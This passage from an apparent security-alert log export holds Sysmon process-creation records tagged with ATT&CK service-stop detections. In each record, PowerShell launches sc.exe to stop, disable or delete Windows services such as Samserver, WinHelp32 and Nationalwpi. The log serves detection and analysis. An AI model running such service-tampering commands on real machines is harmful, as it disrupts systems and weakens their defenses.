Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.806"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010faed1d00}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.089",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.773 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001067ec1d00} +ProcessId: 1844 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.775071900Z"",""eventRecordID"":""2352"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.773\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001067ec1d00}\r\nProcessId: 1844\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.773"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001067ec1d00}"",""processId"":""1844"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.058",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.753 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001092eb1d00} +ProcessId: 3564 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.756300200Z"",""eventRecordID"":""2351"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.753\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001092eb1d00}\r\nProcessId: 3564\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.753"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001092eb1d00}"",""processId"":""3564"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.010",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.669 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001029e81d00} +ProcessId: 8100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.671339500Z"",""eventRecordID"":""2348"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.669\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001029e81d00}\r\nProcessId: 8100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.669"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001029e81d00}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.948",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.578 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010cbe51d00} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.584843400Z"",""eventRecordID"":""2345"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.578\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010cbe51d00}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.578"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010cbe51d00}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.936",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.538 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001000e51d00} +ProcessId: 8136 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.542949100Z"",""eventRecordID"":""2344"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.538\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001000e51d00}\r\nProcessId: 8136\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.538"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001000e51d00}"",""processId"":""8136"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.886",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.504 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001038e31d00} +ProcessId: 6876 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.508097300Z"",""eventRecordID"":""2342"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.504\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001038e31d00}\r\nProcessId: 6876\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.504"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001038e31d00}"",""processId"":""6876"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 